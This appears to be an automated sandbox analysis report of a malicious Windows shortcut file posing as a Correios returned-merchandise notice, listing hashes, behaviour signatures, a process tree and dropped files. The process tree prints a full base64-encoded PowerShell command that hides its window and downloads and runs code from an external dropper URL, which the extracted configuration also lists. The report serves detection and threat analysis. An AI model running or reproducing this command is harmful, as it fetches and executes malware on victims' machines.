Analysis

  • max time kernel
    51s
  • max time network
    51s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-06-2024 02:31

General

  • Target

    Mercadoria_Devolvida-Correios-H0C42E2H.lnk

  • Size

    3KB

  • MD5

    246e74b6fffb9d5994f7f70bb6509b45

  • SHA1

    4b7bdf4808ce987b9f94ea40bdd081217867483a

  • SHA256

    0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e

  • SHA512

    178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4392
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"
          4⤵
            PID:4928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll

      Filesize

      3KB

      MD5

      0c39411b5d7354d62bc468e1ecc003cf

      SHA1

      f303e17b70669aafd6a78621c683cbbc0e9d68b3

      SHA256

      d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb

      SHA512

      00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641

    • C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp

      Filesize

      1KB

      MD5

      d86f725d547cb238fc0e460a6ec552f5

      SHA1

      2928afba43f00889d5e35240c7efb3d94c6e1918

      SHA256

      96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81

      SHA512

      a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs

      Filesize

      187B

      MD5

      7b0e7177dfbb9edd1c1ef08b4fdfae2f

      SHA1

      cb11a0252cdad66ec247312ccb7feb46456e52b6

      SHA256

      6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

      SHA512

      7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline

      Filesize

      369B

      MD5

      c7c971702ae33f87a3c605e7f9a8e3c2

      SHA1

      514d554d797228435d6a0751801826f058c0ed29

      SHA256

      aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e

      SHA512

      c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP

      Filesize

      652B

      MD5

      32f206c989422b3df2f6225c9ac5f9be

      SHA1

      748aef167a738192b6ef21c964c30d9b169d2e4d

      SHA256

      5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c

      SHA512

      edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02

    • memory/4268-2-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

      Filesize

      8KB

    • memory/4268-3-0x000001E9CFC40000-0x000001E9CFC62000-memory.dmp

      Filesize

      136KB

    • memory/4268-13-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4268-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4268-27-0x000001E9CFC90000-0x000001E9CFC98000-memory.dmp

      Filesize

      32KB

    • memory/4268-31-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB